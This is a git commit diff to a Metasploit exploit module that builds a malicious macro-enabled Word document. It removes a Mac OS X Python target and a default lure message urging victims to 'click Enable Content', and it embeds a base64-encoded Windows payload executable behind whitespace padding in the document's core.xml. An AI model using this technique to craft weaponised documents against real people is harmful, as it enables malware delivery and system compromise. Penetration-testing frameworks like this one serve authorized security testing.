I modified windows/fileformat/office_word_macro the wrong way

bug/bundler_fix
wchen-r7 2017-02-16 23:16:06 -06:00
parent 056313e411
commit 1f23b44003
1 changed files with 6 additions and 19 deletions

View File

@ -39,30 +39,18 @@ class MetasploitModule < Msf::Exploit::Remote
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => true
},
'Platform' => 'win',
'Targets' =>
[
[
'Microsoft Office Word on Windows',
{
'Platform' => 'win',
}
],
[
'Microsoft Office Word on Mac OS X (Python)',
{
'Platform' => 'python',
'Arch' => ARCH_PYTHON
}
]
['Microsoft Office Word', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jan 10 2012"
'DisclosureDate' => "Jan 10 2012",
'DefaultTarget' => 0
))
register_options([
OptString.new("BODY", [false, 'The message for the document body',
'Contents of this document are protected. Please click Enable Content to continue.'
]),
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
], self.class)
end
@ -75,9 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
when /document\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /core\.xml/
p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
b64_payload = ' ' * 55
b64_payload << Rex::Text.encode_base64(p)
b64_payload << Rex::Text.encode_base64(generate_payload_exe)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
end